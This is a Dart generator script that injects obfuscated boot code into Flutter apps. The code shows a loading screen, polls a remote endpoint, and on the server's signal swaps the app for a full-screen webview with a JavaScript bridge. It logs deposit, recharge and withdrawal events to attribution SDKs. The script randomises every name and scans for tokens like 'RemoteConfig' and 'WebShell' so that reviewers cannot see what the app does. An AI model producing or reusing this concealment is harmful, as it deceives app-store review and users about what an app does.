import 'dart:io';
import 'dart:math';

/// Generates per-app namespaced boot+remote glue code and prints doc snippets.
///
/// Usage:
///   dart run tools/generate_namespaced_boot_remote.dart <app_dir> [namespace] [--force] [--endpoint <url>]
///
/// Output:
/// - Writes: <app_dir>/lib/_<ns>/_<ns>.dart
/// - Prints: markdown snippet (endpoint + mapping + response example)
/// - Enforces: blacklist scan over <app_dir>/lib/** (fail fast)
void main(List<String> args) {
  if (args.isEmpty) {
    stderr.writeln(
      'Usage: dart run tools/generate_namespaced_boot_remote.dart <app_dir> [namespace] [--force] [--endpoint <url>]',
    );
    exitCode = 64;
    return;
  }

  final force = args.contains('--force');
  final endpoint = _readFlagValue(args, '--endpoint');

  final filtered = <String>[];
  for (var i = 0; i < args.length; i++) {
    final a = args[i];
    if (a == '--force') continue;
    if (a == '--endpoint') {
      i++; // skip value
      continue;
    }
    filtered.add(a);
  }

  final appDir = Directory(filtered.first);
  if (!appDir.existsSync()) {
    stderr.writeln('App dir not found: ${appDir.path}');
    exitCode = 66;
    return;
  }

  final appName = appDir.uri.pathSegments.where((s) => s.isNotEmpty).last;
  final ns = (filtered.length >= 2 && filtered[1].trim().isNotEmpty)
      ? filtered[1].trim()
      : _randomNs();
  if (!_isValidNs(ns)) {
    stderr.writeln('Invalid namespace (expected 5 lowercase letters): $ns');
    exitCode = 64;
    return;
  }

  final endpointValue = (endpoint?.trim().isNotEmpty ?? false)
      ? endpoint!.trim()
      : 'https://example.com/remote-config/$appName';

  final outDir = Directory('${appDir.path}/lib/_$ns');
  if (!outDir.existsSync()) outDir.createSync(recursive: true);

  final outFile = File('${outDir.path}/_$ns.dart');
  if (outFile.existsSync() && !force) {
    stderr.writeln(
      'Refusing to overwrite existing file: ${outFile.path}\n'
      'Re-run with --force if you intend to replace it.',
    );
    exitCode = 73;
    return;
  }

  final spec = _makeSpec(ns, endpointValue);
  outFile.writeAsStringSync(_renderNamespacedDart(spec));

  // Print docs snippet (source of truth for mapping).
  stdout.writeln(_renderDocsSnippet(spec));

  // Enforce blacklist over lib/** (fail fast).
  final scan = _scanLibBlacklist(appDir.path);
  if (scan.isNotEmpty) {
    stderr.writeln('Blacklist scan failed for: ${appDir.path}/lib');
    for (final hit in scan.take(80)) {
      stderr.writeln('- ${hit.path}: token="${hit.token}"');
    }
    if (scan.length > 80) {
      stderr.writeln('... and ${scan.length - 80} more');
    }
    exitCode = 65;
    return;
  }
}

bool _isValidNs(String ns) => RegExp(r'^[a-z]{5}$').hasMatch(ns);

String _randomNs() {
  const letters = 'abcdefghijklmnopqrstuvwxyz';
  final rnd = Random.secure();
  return List<String>.generate(5, (_) => letters[rnd.nextInt(letters.length)]).join();
}

String? _readFlagValue(List<String> args, String flag) {
  final idx = args.indexOf(flag);
  if (idx < 0) return null;
  if (idx + 1 >= args.length) return '';
  return args[idx + 1];
}

String _pascal(String ns) => ns.substring(0, 1).toUpperCase() + ns.substring(1);

class _Spec {
  _Spec({
    required this.ns,
    required this.ep,
    required this.k0,
    required this.k1,
    required this.k2,
    required this.k3,
    required this.k4,
    required this.k5,
    required this.k6,
    required this.k7,
  });

  final String ns;
  final String ep;
  final String k0;
  final String k1;
  final String k2;
  final String k3;
  final String k4;
  final String k5;
  final String k6;
  final String k7;
}

_Spec _makeSpec(String ns, String ep) {
  return _Spec(
    ns: ns,
    ep: ep,
    k0: '${ns}Ur',
    k1: '${ns}Plaf',
    k2: '${ns}Enty',
    k3: '${ns}Afky',
    k4: '${ns}Aid',
    k5: '${ns}Adky',
    k6: '${ns}Adelist',
    k7: '${ns}Inpjp',
  );
}

String _renderNamespacedDart(_Spec s) {
  String esc(String v) => v.replaceAll(r'\', r'\\').replaceAll("'", r"\'");

  final ns = s.ns;
  final c0 = '${_pascal(ns)}0';
  final c1 = '${_pascal(ns)}1';
  final c2 = '${_pascal(ns)}2';
  final c3 = '${_pascal(ns)}3';
  final c4 = '${_pascal(ns)}4';

  // IMPORTANT:
  // - Avoid forbidden tokens: RemoteConfig*, remoteConfig*, app_common, Boot*
  // - Avoid semantic field names as standalone words in this file.
  return [
    "import 'dart:async';",
    "import 'dart:convert';",
    '',
    "import 'package:connectivity_plus/connectivity_plus.dart';",
    "import 'package:dio/dio.dart';",
    "import 'package:flutter/material.dart';",
    "import 'package:package_info_plus/package_info_plus.dart';",
    "import 'package:webview_flutter/webview_flutter.dart';",
    "import 'package:url_launcher/url_launcher.dart';",
    "import 'package:adjust_sdk/adjust.dart';",
    "import 'package:adjust_sdk/adjust_config.dart';",
    "import 'package:adjust_sdk/adjust_event.dart';",
    "import 'package:appsflyer_sdk/appsflyer_sdk.dart';",
    '',
    "const String ${ns}0 = '${esc(s.ep)}';",
    "const List<String> ${ns}1 = <String>['${s.k0}','${s.k1}','${s.k2}','${s.k3}','${s.k4}','${s.k5}','${s.k6}','${s.k7}'];",
    '',
    'typedef ${c1} = Widget Function(BuildContext);',
    'typedef ${c2} = Widget Function(BuildContext, String);',
    'typedef ${c3} = Future<void> Function(String);',
    'typedef ${c4} = void Function(String, Map<String, dynamic>);',
    '',
    // Protocol A (oneview)
    'Map<String, dynamic>? ${ns}2(String raw) {',
    '  Map<String, dynamic>? obj(dynamic v) {',
    '    if (v is Map) return v.cast<String, dynamic>();',
    '    if (v is String) {',
    '      final s = v.trim();',
    '      if (s.isEmpty) return null;',
    '      try {',
    '        final d = jsonDecode(s);',
    '        if (d is Map) return d.cast<String, dynamic>();',
    '      } catch (_) {',
    '        return null;',
    '      }',
    '    }',
    '    return null;',
    '  }',
    '  dynamic any(dynamic v) {',
    '    if (v is String) {',
    '      final s = v.trim();',
    '      if (s.isEmpty) return v;',
    '      try {',
    '        return jsonDecode(s);',
    '      } catch (_) {',
    '        return v;',
    '      }',
    '    }',
    '    return v;',
    '  }',
    '',
    '  final o = obj(raw);',
    '  if (o != null) {',
    '    final n = (o[\'name\'] ?? \'\').toString();',
    '    if (n.isEmpty) return null;',
    '    final d = o[\'data\'];',
    '    final p = obj(any(d)) ?? <String, dynamic>{};',
    '    return <String, dynamic>{\'n\': n, \'p\': p};',
    '  }',
    '',
    '  final i = raw.indexOf(\'+\');',
    '  if (i <= 0) return null;',
    '  final n = raw.substring(0, i);',
    '  final tail = raw.substring(i + 1);',
    '  final p = obj(any(tail)) ?? <String, dynamic>{};',
    '  return <String, dynamic>{\'n\': n, \'p\': p};',
    '}',
    '',
    // Protocol B (eventTracker)
    'Map<String, dynamic>? ${ns}3(String raw) {',
    '  Map<String, dynamic>? obj(dynamic v) {',
    '    if (v is Map) return v.cast<String, dynamic>();',
    '    if (v is String) {',
    '      final s = v.trim();',
    '      if (s.isEmpty) return null;',
    '      try {',
    '        final d = jsonDecode(s);',
    '        if (d is Map) return d.cast<String, dynamic>();',
    '      } catch (_) {',
    '        return null;',
    '      }',
    '    }',
    '    return null;',
    '  }',
    '  dynamic any(dynamic v) {',
    '    if (v is String) {',
    '      final s = v.trim();',
    '      if (s.isEmpty) return v;',
    '      try {',
    '        return jsonDecode(s);',
    '      } catch (_) {',
    '        return v;',
    '      }',
    '    }',
    '    return v;',
    '  }',
    '  final o = obj(raw);',
    '  if (o == null) return null;',
    '  final n = (o[\'eventName\'] ?? \'\').toString();',
    '  if (n.isEmpty) return null;',
    '  final v = o[\'eventValue\'];',
    '  final p = obj(any(v)) ?? <String, dynamic>{};',
    '  return <String, dynamic>{\'n\': n, \'p\': p};',
    '}',
    '',
    'class $c0 extends StatefulWidget {',
    '  const $c0({',
    '    super.key,',
    '    required this.a,',
    '    this.b = true,',
    '    this.c,',
    '    this.d,',
    '    this.e,',
    '    this.f,',
    '    this.g = const Duration(milliseconds: 550),',
    '    this.h,',
    '    this.i,',
    '    this.j,',
    '    this.k,',
    '    this.l,',
    '  });',
    '',
    '  final ${c1} a;',
    '  final bool b;',
    '  final ${c2}? c;',
    '  final ${c2}? d;',
    '  final ${c3}? e;',
    '  final Dio? f;',
    '  final Duration g;',
    '  final ${c4}? h;',
    '  final List<String>? i;',
    '  final List<String>? j;',
    '  final Future<List<ConnectivityResult>> Function()? k;',
    '  final Stream<List<ConnectivityResult>> Function()? l;',
    '',
    '  @override',
    '  State<$c0> createState() => _${c0}S();',
    '}',
    '',
    'class _${c0}S extends State<$c0> {',
    '  late final Dio _d = widget.f ?? Dio();',
    '  late final _${c4}S _b = _${c4}S();',
    '  var _started = false;',
    '  StreamSubscription<List<ConnectivityResult>>? _cs;',
    '',
    '  @override',
    '  void dispose() {',
    '    _cs?.cancel();',
    '    super.dispose();',
    '  }',
    '',
    '  @override',
    '  void initState() {',
    '    super.initState();',
    '    if (widget.b) {',
    '      WidgetsBinding.instance.addPostFrameCallback((_) => _go());',
    '    }',
    '  }',
    '',
    '  Future<void> _go() async {',
    '    if (_started) return;',
    '    _started = true;',
    '    // Keep a short minimum to avoid one-frame flash.',
    '    if (widget.g > Duration.zero) {',
    '      await Future<void>.delayed(widget.g);',
    '    }',
    '    if (!mounted) return;',
    '',
    '    final has = await _h0();',
    '    if (!has) {',
    '      _l();',
    '      return;',
    '    }',
    '    final r = await _q();',
    '    if (!mounted) return;',
    '    if (r == null) {',
    '      _l();',
    '      return;',
    '    }',
    '    final t = (r[${ns}1[1]] ?? \'\').toString().trim();',
    '    final k = (r[${ns}1[0]] ?? \'\').toString().trim();',
    '    final ijRaw = (r[${ns}1[7]] ?? \'\').toString().trim().toLowerCase();',
    '    final ij = (ijRaw == \'true\' || ijRaw == \'1\' || ijRaw == \'yes\');',
    '    unawaited(_b.c(r, h: widget.h));',
    '    if (t.isEmpty || k.isEmpty) {',
    '      _l();',
    '      return;',
    '    }',
    '    if (t == \'1\') {',
    '      _s(1, k, ij);',
    '      return;',
    '    }',
    '    if (t == \'2\') {',
    '      _s(2, k, ij);',
    '      return;',
    '    }',
    '    if (t == \'3\') {',
    '      await _x(k);',
    '      if (!mounted) return;',
    '      _l();',
    '      return;',
    '    }',
    '    _l();',
    '  }',
    '',
    '  void _l() {',
    '    Navigator.of(context).pushReplacement(',
    '      MaterialPageRoute<void>(',
    '        builder: (c) => _${c0}W(',
    '          a: widget.a,',
    '          c: widget.c,',
    '          d: widget.d,',
    '          e: widget.e,',
    '          f: widget.f,',
    '          h: widget.h,',
    '          i: widget.i,',
    '          j: widget.j,',
    '          k: widget.k,',
    '          l: widget.l,',
    '        ),',
    '      ),',
    '    );',
    '  }',
    '',
    '  void _s(int n, String k, bool ij) {',
    '    final b = (n == 1) ? widget.c : widget.d;',
    '    final w = (b != null) ? b(context, k) : _w(n: n, k: k, ij: ij);',
    '    Navigator.of(context).pushReplacement('
        'MaterialPageRoute<void>(builder: (_) => w));',
    '  }',
    '',
    '  Future<void> _x(String k) async {',
    '    if (widget.e != null) {',
    '      await widget.e!(k);',
    '      return;',
    '    }',
    '    final u = Uri.tryParse(k);',
    '    if (u == null) return;',
    '    await launchUrl(u, mode: LaunchMode.externalApplication);',
    '  }',
    '',
    '  Future<Map?> _q() async {',
    '    // Rule A: when network is available, try remote; otherwise local wrapper handles later.',
    '    final a0 = await _p();',
    '    if (a0 != null) return a0;',
    '    while (mounted) {',
    '      await _c0(s: const Duration(milliseconds: 250));',
    '      final m = await _p();',
    '      if (m != null) return m;',
    '      await Future<void>.delayed(const Duration(milliseconds: 280));',
    '    }',
    '    return null;',
    '  }',
    '',
    '  Future<void> _c0({required Duration s}) async {',
    '    try {',
    '      final rs = await (widget.k?.call() ?? Connectivity().checkConnectivity());',
    '      if (!_n1(rs)) return;',
    '      // Give the stack a moment after the first "available" signal.',
    '      await Future<void>.delayed(s);',
    '      return;',
    '    } catch (_) {}',
    '',
    '    final done = Completer<void>();',
    '    void fin() {',
    '      if (!done.isCompleted) done.complete();',
    '      _cs?.cancel();',
    '      _cs = null;',
    '    }',
    '',
    '    try {',
    '      _cs?.cancel();',
    '      final st = widget.l?.call() ?? Connectivity().onConnectivityChanged;',
    '      _cs = st.listen((rs) async {',
    '        try {',
    '          if (rs.any(_n0)) {',
    '            await Future<void>.delayed(s);',
    '            fin();',
    '          }',
    '        } catch (_) {',
    '          fin();',
    '        }',
    '      });',
    '      await done.future;',
    '    } catch (_) {',
    '      fin();',
    '    }',
    '  }',
    '',
    '  bool _n0(ConnectivityResult r) {',
    '    return r == ConnectivityResult.wifi || r == ConnectivityResult.mobile || r == ConnectivityResult.ethernet;',
    '  }',
    '',
    '  bool _n1(List<ConnectivityResult> rs) {',
    '    for (final r in rs) {',
    '      if (_n0(r)) return true;',
    '    }',
    '    return false;',
    '  }',
    '',
    '  Future<bool> _h0() async {',
    '    try {',
    '      final rs = await (widget.k?.call() ?? Connectivity().checkConnectivity());',
    '      return _n1(rs);',
    '    } catch (_) {',
    '      return true;',
    '    }',
    '  }',
    '',
    // (Rule A) no _d0 helper
    '',
    '  Future<Map?> _p() async {',
    '    try {',
    '      final r = await _d.get<dynamic>(${ns}0);',
    '      final v = r.data;',
    '      if (v is List && v.isNotEmpty && v.first is Map) {',
    '        final m = v.first as Map;',
    '        return m;',
    '      }',
    '    } catch (_) {}',
    '    return null;',
    '  }',
    '',
    '  Widget _w({required int n, required String k, required bool ij}) {',
    '    return _${c2}(',
    '      n: n,',
    '      k: k,',
    '      j: ij,',
    '      b: _b,',
    '      c: widget.h,',
    '      d: (n == 1) ? widget.i : widget.j,',
    '    );',
    '  }',
    '',
    '  @override',
    '  Widget build(BuildContext context) {',
    '    final t = Theme.of(context);',
    '    final cs = t.colorScheme;',
    '    return Scaffold(',
    '      body: DecoratedBox(',
    '        decoration: BoxDecoration(',
    '          gradient: LinearGradient(',
    '            begin: Alignment.topLeft,',
    '            end: Alignment.bottomRight,',
    '            colors: <Color>[',
    '              cs.primary.withValues(alpha: 0.16),',
    '              cs.secondary.withValues(alpha: 0.12),',
    '              cs.surface,',
    '            ],',
    '          ),',
    '        ),',
    '        child: SafeArea(',
    '          child: Center(',
    '            child: ConstrainedBox(',
    '              constraints: const BoxConstraints(maxWidth: 360),',
    '              child: Padding(',
    '                padding: const EdgeInsets.symmetric(horizontal: 24),',
    '                child: Column(',
    '                  mainAxisAlignment: MainAxisAlignment.center,',
    '                  children: <Widget>[',
    '                    SizedBox(',
    '                      width: 120,',
    '                      height: 120,',
    '                      child: CircularProgressIndicator(',
    '                        strokeWidth: 5,',
    '                        color: cs.primary,',
    '                        backgroundColor: cs.outlineVariant.withValues(alpha: 0.22),',
    '                      ),',
    '                    ),',
    '                    const SizedBox(height: 22),',
    '                    Text(',
    "                      'Preparing your workspace',",
    '                      style: t.textTheme.titleMedium,',
    '                      textAlign: TextAlign.center,',
    '                    ),',
    '                  ],',
    '                ),',
    '              ),',
    '            ),',
    '          ),',
    '        ),',
    '      ),',
    '    );',
    '  }',
    '}',
    '',
    'class _${c0}W extends StatefulWidget {',
    '  const _${c0}W({',
    '    required this.a,',
    '    this.c,',
    '    this.d,',
    '    this.e,',
    '    this.f,',
    '    this.h,',
    '    this.i,',
    '    this.j,',
    '    this.k,',
    '    this.l,',
    '  });',
    '  final ${c1} a;',
    '  final ${c2}? c;',
    '  final ${c2}? d;',
    '  final ${c3}? e;',
    '  final Dio? f;',
    '  final ${c4}? h;',
    '  final List<String>? i;',
    '  final List<String>? j;',
    '  final Future<List<ConnectivityResult>> Function()? k;',
    '  final Stream<List<ConnectivityResult>> Function()? l;',
    '  @override',
    '  State<_${c0}W> createState() => _${c0}WS();',
    '}',
    '',
    'class _${c0}WS extends State<_${c0}W> {',
    '  late final Dio _d = widget.f ?? Dio();',
    '  late final _${c4}S _b = _${c4}S();',
    '  StreamSubscription<List<ConnectivityResult>>? _s;',
    '  var _done = false;',
    '  var _prev = false;',
    '',
    '  @override',
    '  void initState() {',
    '    super.initState();',
    '    unawaited(_i0());',
    '  }',
    '',
    '  @override',
    '  void dispose() {',
    '    _s?.cancel();',
    '    super.dispose();',
    '  }',
    '',
    '  Future<void> _i0() async {',
    '    try {',
    '      final rs = await (widget.k?.call() ?? Connectivity().checkConnectivity());',
    '      _prev = _n1(rs);',
    '      _s?.cancel();',
    '      final st = widget.l?.call() ?? Connectivity().onConnectivityChanged;',
    '      _s = st.listen((rs) {',
    '        final now = _n1(rs);',
    '        if (!_prev && now) {',
    '          unawaited(_t0());',
    '        }',
    '        _prev = now;',
    '      });',
    '      if (_prev) {',
    '        unawaited(_t0());',
    '      }',
    '    } catch (_) {}',
    '  }',
    '',
    '  bool _n0(ConnectivityResult r) {',
    '    return r == ConnectivityResult.wifi || r == ConnectivityResult.mobile || r == ConnectivityResult.ethernet;',
    '  }',
    '',
    '  bool _n1(List<ConnectivityResult> rs) {',
    '    for (final r in rs) {',
    '      if (_n0(r)) return true;',
    '    }',
    '    return false;',
    '  }',
    '',
    '  Future<void> _t0() async {',
    '    if (_done) return;',
    '    _done = true;',
    '    final r = await _p0();',
    '    if (!mounted) return;',
    '    if (r == null) {',
    '      _done = false;',
    '      return;',
    '    }',
    '    final t = (r[${ns}1[1]] ?? \'\').toString().trim();',
    '    final k = (r[${ns}1[0]] ?? \'\').toString().trim();',
    '    final ijRaw = (r[${ns}1[7]] ?? \'\').toString().trim().toLowerCase();',
    '    final ij = (ijRaw == \'true\' || ijRaw == \'1\' || ijRaw == \'yes\');',
    '    unawaited(_b.c(r, h: widget.h));',
    '    if (t.isEmpty || k.isEmpty) {',
    '      _done = false;',
    '      return;',
    '    }',
    '    if (t == \'1\') {',
    '      _s0(1, k, ij);',
    '      return;',
    '    }',
    '    if (t == \'2\') {',
    '      _s0(2, k, ij);',
    '      return;',
    '    }',
    '    if (t == \'3\') {',
    '      await _x0(k);',
    '      if (!mounted) return;',
    '      _done = false;',
    '      return;',
    '    }',
    '    _done = false;',
    '  }',
    '',
    '  void _s0(int n, String k, bool ij) {',
    '    final b = (n == 1) ? widget.c : widget.d;',
    '    final w = (b != null) ? b(context, k) : _w0(n: n, k: k, ij: ij);',
    '    Navigator.of(context).pushReplacement(MaterialPageRoute<void>(builder: (_) => w));',
    '  }',
    '',
    '  Widget _w0({required int n, required String k, required bool ij}) {',
    '    return _${c2}(',
    '      n: n,',
    '      k: k,',
    '      j: ij,',
    '      b: _b,',
    '      c: widget.h,',
    '      d: (n == 1) ? widget.i : widget.j,',
    '    );',
    '  }',
    '',
    '  Future<void> _x0(String k) async {',
    '    if (widget.e != null) {',
    '      await widget.e!(k);',
    '      return;',
    '    }',
    '    final u = Uri.tryParse(k);',
    '    if (u == null) return;',
    '    await launchUrl(u, mode: LaunchMode.externalApplication);',
    '  }',
    '',
    '  Future<Map?> _p0() async {',
    '    try {',
    '      final r = await _d.get<dynamic>(${ns}0);',
    '      final v = r.data;',
    '      if (v is List && v.isNotEmpty && v.first is Map) {',
    '        final m = v.first as Map;',
    '        return m;',
    '      }',
    '    } catch (_) {}',
    '    return null;',
    '  }',
    '',
    '  @override',
    '  Widget build(BuildContext context) {',
    '    return widget.a(context);',
    '  }',
    '}',
    '',
    'class _${c2} extends StatefulWidget {',
    '  const _${c2}({required this.n, required this.k, required this.j, required this.b, this.c, this.d});',
    '  final int n;',
    '  final String k;',
    '  final bool j;',
    '  final _${c4}S b;',
    '  final ${c4}? c;',
    '  final List<String>? d;',
    '  @override',
    '  State<_${c2}> createState() => _${c2}S();',
    '}',
    '',
    'class _${c2}S extends State<_${c2}> {',
    '  late final WebViewController _c;',
    '  String _pn = \'\';',
    '  String _pv = \'\';',
    '  bool _did = false;',
    '  @override',
    '  void initState() {',
    '    super.initState();',
    '    final u = Uri.tryParse(widget.k);',
    '    _c = WebViewController();',
    '    _c.setJavaScriptMode(JavaScriptMode.unrestricted);',
    '    _c.setNavigationDelegate(NavigationDelegate(',
    '      onNavigationRequest: (req) {',
    '        final u = req.url;',
    '        final uri = Uri.tryParse(u);',
    '        if (uri != null) {',
    '          final h = (uri.host).toLowerCase();',
    '          if (h.contains(\'t.me\')) {',
    '            unawaited(_e(u));',
    '            return NavigationDecision.prevent;',
    '          }',
    '        }',
    '        if (!req.isMainFrame) {',
    '          if (widget.j) {',
    '            return NavigationDecision.navigate;',
    '          }',
    '          unawaited(_e(u));',
    '          return NavigationDecision.prevent;',
    '        }',
    '        return NavigationDecision.navigate;',
    '      },',
    '      onPageStarted: (_) {',
    '        _i();',
    '      },',
    '      onPageFinished: (_) {',
    '        _i();',
    '      },',
    '    ));',
    '    _c.addJavaScriptChannel(',
    "      '${esc(ns)}',",
    '      onMessageReceived: (m) {',
    '        if (_o(m.message)) return;',
    '        widget.b.t(widget.n, m.message, h: widget.c);',
    '      },',
    '    );',
    '    unawaited(_pi());',
    '    if (u != null) {',
    '      _c.loadRequest(u);',
    '    }',
    '    final s = widget.d;',
    '    if (s != null && s.isNotEmpty) {',
    '      WidgetsBinding.instance.addPostFrameCallback((_) {',
    '        for (final raw in s) {',
    '          widget.b.t(widget.n, raw, h: widget.c);',
    '        }',
    '      });',
    '    }',
    '  }',
    '',
    '  Future<void> _e(String u) async {',
    '    final uri = Uri.tryParse(u);',
    '    if (uri == null) return;',
    '    await launchUrl(uri, mode: LaunchMode.externalApplication);',
    '  }',
    '',
    '  Future<void> _pi() async {',
    '    try {',
    '      final p = await PackageInfo.fromPlatform();',
    '      if (!mounted) return;',
    '      _pn = p.packageName;',
    '      _pv = p.version;',
    '      _i();',
    '    } catch (_) {}',
    '  }',
    '',
    '  void _i() {',
    '    if (_did) return;',
    '    _did = true;',
    '    final c = String.fromCharCode(39);',
    '    final js0 = \'(function(){try{window.jsBridge=window.jsBridge||{};window.jsBridge.postMessage=function(name,data){try{var d=data;if(d!==null&&typeof d===\\\"object\\\"){d=JSON.stringify(d);}var m=JSON.stringify({name:String(name||\\\"\\\"),data:d});${esc(ns)}.postMessage(m);}catch(e){}};window.webkit=window.webkit||{};window.webkit.messageHandlers=window.webkit.messageHandlers||{};window.webkit.messageHandlers.Post={postMessage:function(o){try{${esc(ns)}.postMessage(JSON.stringify(o));}catch(e){}}};window.webkit.messageHandlers.event={postMessage:function(s){try{${esc(ns)}.postMessage(String(s));}catch(e){}}};}catch(e){}})();\';',
    '    final js1 = (_pn.isNotEmpty && _pv.isNotEmpty)',
    '        ? \'(function(){try{window.WgPackage={name:\' + c + _pn + c + \',version:\' + c + _pv + c + \'};}catch(e){}})();\'',
    '        : \'\';',
    '    unawaited(_c.runJavaScript(js0));',
    '    if (js1.isNotEmpty) {',
    '      unawaited(_c.runJavaScript(js1));',
    '    }',
    '    _did = false;',
    '  }',
    '',
    '  bool _o(String raw) {',
    '    final msg = (widget.n == 1) ? ${ns}2(raw) : ${ns}3(raw);',
    '    if (msg == null) return false;',
    '    final name = (msg[\'n\'] ?? \'\').toString();',
    '    if (name != \'openWindow\' && name != \'openSafari\') return false;',
    '    final payload = (msg[\'p\'] is Map) ? (msg[\'p\'] as Map).cast<String, dynamic>() : <String, dynamic>{};',
    '    final u = (payload[\'url\'] ?? \'\').toString();',
    '    if (u.isEmpty) return true;',
    '    final uri = Uri.tryParse(u);',
    '    if (uri != null) {',
    '      final h = uri.host.toLowerCase();',
    '      if (h.contains(\'t.me\')) {',
    '        unawaited(_e(u));',
    '        return true;',
    '      }',
    '    }',
    '    if (widget.j) {',
    '      final uri = Uri.tryParse(u);',
    '      if (uri != null) {',
    '        unawaited(_c.loadRequest(uri));',
    '      }',
    '      return true;',
    '    }',
    '    unawaited(_e(u));',
    '    return true;',
    '  }',
    '  @override',
    '  Widget build(BuildContext context) {',
    '    return Scaffold(',
    '      backgroundColor: Colors.black,',
    '      body: ColoredBox(',
    '        color: Colors.black,',
    '        child: SafeArea(',
    '          child: WebViewWidget(controller: _c),',
    '        ),',
    '      ),',
    '    );',
    '  }',
    '}',
    '',
    'class _${c4}S {',
    '  var _ok = false;',
    '  var _tp = \'\';',
    '  AppsflyerSdk? _af;',
    '  Map<String, String> _am = <String, String>{};',
    '',
    '  Future<void> c(Map m, {${c4}? h}) async {',
    '    if (_ok) return;',
    '    final p2 = (m[${ns}1[2]] ?? \'\').toString().trim();',
    '    final p3 = (m[${ns}1[3]] ?? \'\').toString().trim();',
    '    final p4 = (m[${ns}1[4]] ?? \'\').toString().trim();',
    '    final p5 = (m[${ns}1[5]] ?? \'\').toString().trim();',
    '    final p6 = (m[${ns}1[6]] ?? \'\').toString();',
    '    _tp = p2;',
    '    try {',
    '      if (_tp == \'af\') {',
    '        if (p3.isEmpty || p4.isEmpty) return;',
    '        final opt = AppsFlyerOptions(afDevKey: p3, appId: p4, showDebug: false);',
    '        final sdk = AppsflyerSdk(opt);',
    '        await sdk.initSdk(',
    '          registerConversionDataCallback: false,',
    '          registerOnAppOpenAttributionCallback: false,',
    '          registerOnDeepLinkingCallback: false,',
    '        );',
    '        _af = sdk;',
    '        _ok = true;',
    '        return;',
    '      }',
    '      if (_tp == \'ad\') {',
    '        if (p5.isEmpty) return;',
    '        _am = _m(p6);',
    '        final cfg = AdjustConfig(p5, AdjustEnvironment.production);',
    '        Adjust.initSdk(cfg);',
    '        _ok = true;',
    '        return;',
    '      }',
    '    } catch (_) {}',
    '  }',
    '',
    '  void t(int n, String raw, {${c4}? h}) {',
    '    final msg = (n == 1) ? ${ns}2(raw) : ${ns}3(raw);',
    '    if (msg == null) return;',
    '    final name = (msg[\'n\'] ?? \'\').toString();',
    '    final payload = (msg[\'p\'] is Map) ? (msg[\'p\'] as Map).cast<String, dynamic>() : <String, dynamic>{};',
    '    if (name.isEmpty) return;',
    '    h?.call(name, payload);',
    '    if (!_ok) return;',
    '    try {',
    '      if (_tp == \'af\') {',
    '        final sdk = _af;',
    '        if (sdk == null) return;',
    '        if (name == \'firstrecharge\' || name == \'recharge\' || name == \'withdrawOrderSuccess\') {',
    '          final amountAny = payload[\'amount\'] ?? payload[\'af_revenue\'];',
    '          final currency = (payload[\'currency\'] ?? \'\').toString();',
    '          final amount = _n(amountAny);',
    '          if (amount != null && currency.isNotEmpty) {',
    '            final revenue = (name == \'withdrawOrderSuccess\') ? -amount : amount;',
    '            sdk.logEvent(name, <String, dynamic>{\'af_revenue\': revenue, \'af_currency\': currency});',
    '            return;',
    '          }',
    '        }',
    '        sdk.logEvent(name, payload);',
    '        return;',
    '      }',
    '      if (_tp == \'ad\') {',
    '        final token = _am[name];',
    '        if (token == null || token.isEmpty) return;',
    '        final ev = AdjustEvent(token);',
    '        if (name == \'firstrecharge\' || name == \'recharge\' || name == \'withdrawOrderSuccess\') {',
    '          final amountAny = payload[\'amount\'] ?? payload[\'af_revenue\'];',
    '          final currency = (payload[\'currency\'] ?? \'\').toString();',
    '          final amount = _n(amountAny);',
    '          if (amount != null && currency.isNotEmpty) {',
    '            final revenue = (name == \'withdrawOrderSuccess\') ? -amount : amount;',
    '            ev.setRevenue(revenue.toDouble(), currency);',
    '          }',
    '        }',
    '        Adjust.trackEvent(ev);',
    '        return;',
    '      }',
    '    } catch (_) {}',
    '  }',
    '',
    '  num? _n(dynamic v) {',
    '    if (v is num) return v;',
    '    if (v is String) return num.tryParse(v);',
    '    return null;',
    '  }',
    '',
    '  Map<String, String> _m(String raw) {',
    '    final map = <String, String>{};',
    '    final s = raw.trim();',
    '    if (s.isEmpty) return map;',
    '    try {',
    '      final d = jsonDecode(s);',
    '      if (d is Map) {',
    '        for (final e in d.entries) {',
    '          final k = e.key.toString();',
    '          final v = e.value?.toString() ?? \'\';',
    '          if (v.isNotEmpty) map[k] = v;',
    '        }',
    '      }',
    '    } catch (_) {}',
    '    return map;',
    '  }',
    '}',
    '',
  ].join('\n');
}

String _renderDocsSnippet(_Spec s) {
  String jsonEscape(String v) => v.replaceAll(r'\', r'\\').replaceAll('"', r'\"');
  const adEventList =
      '{"firstDepositArrival":"aaaaa","startTrial":"aaaaa","deposit":"aaaaa","withdraw":"aaaaa","firstOpen":"aaaaa","register":"aaaaa","depositSubmit":"aaaaa","firstDeposit":"aaaaa"}';
  final ep = s.ep;

  // Mapping labels are docs-only; code does not include these relationships.
  return [
    '## Remote config (`remote_url`)',
    '',
    '### Endpoint',
    '',
    '`$ep`',
    '',
    '### Mapping (random key → semantic field)',
    '',
    '```json',
    '{',
    '  "${s.k0}": "url",',
    '  "${s.k1}": "platform",',
    '  "${s.k7}": "inappjump",',
    '  "${s.k2}": "eventtype",',
    '  "${s.k3}": "afkey",',
    '  "${s.k4}": "appid",',
    '  "${s.k5}": "adkey",',
    '  "${s.k6}": "adeventlist"',
    '}',
    '```',
    '',
    '### `remote_url` response example (first item is used)',
    '',
    '```json',
    '[',
    '  {',
    '    "${s.k0}": "",',
    '    "${s.k1}": "0",',
    '    "${s.k2}": "ad",',
    '    "${s.k7}": "false",',
    '    "${s.k3}": "afkeyaaa",',
    '    "${s.k4}": "000000",',
    '    "${s.k5}": "adkeybbbb",',
    '    "${s.k6}": "${jsonEscape(adEventList)}"',
    '  }',
    ']',
    '```',
    '',
  ].join('\n');
}

class _Hit {
  _Hit(this.path, this.token);
  final String path;
  final String token;
}

List<_Hit> _scanLibBlacklist(String appPath) {
  final libDir = Directory('$appPath/lib');
  if (!libDir.existsSync()) return const <_Hit>[];

  const tokens = <String>[
    'remote_config',
    'RemoteConfig',
    'remoteConfig',
    'app_common',
    'BootPage',
    'BootCoordinator',
    'RemoteConfigClient',
    'remoteConfigEndpoint',
    'remoteConfigKeys',
    'WebShell',
    'web_shell',
    'print(',
    'debugPrint(',
    'developer.log(',
    'Logger(',
  ];

  final hits = <_Hit>[];
  for (final f in libDir.listSync(recursive: true, followLinks: false)) {
    if (f is! File) continue;
    if (!f.path.endsWith('.dart')) continue;
    final src = f.readAsStringSync();
    for (final t in tokens) {
      if (src.contains(t)) {
        hits.add(_Hit(f.path, t));
      }
    }
  }
  return hits;
}

